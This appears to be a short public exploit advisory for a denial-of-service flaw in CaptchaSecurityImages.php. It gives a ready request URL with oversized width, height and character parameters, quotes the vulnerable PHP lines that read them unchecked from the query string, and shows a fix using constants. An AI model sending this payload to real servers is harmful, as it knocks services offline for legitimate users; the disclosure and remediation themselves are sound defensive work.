# Exploit Title: CaptchaSecurityImages.php Denial Of Service# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php###[Denial Of Service](OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server)for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical,or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited,or the way the service handles resources used by it.)##Exploit:/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337##
The vuln code is:(lines 73-75)#
$width = isset($_GET['width']) ? $_GET['width']:'120';
$height = isset($_GET['height']) ? $_GET['height']:'40';
$characters = isset($_GET['characters'])&& $_GET['characters']>1 ? $_GET['characters']:'6';#
To fix it- delete all the "$_GET[x]" strings and make it constant, like this:#
$width=100;
$height=40;
$characters=5;###[e0f]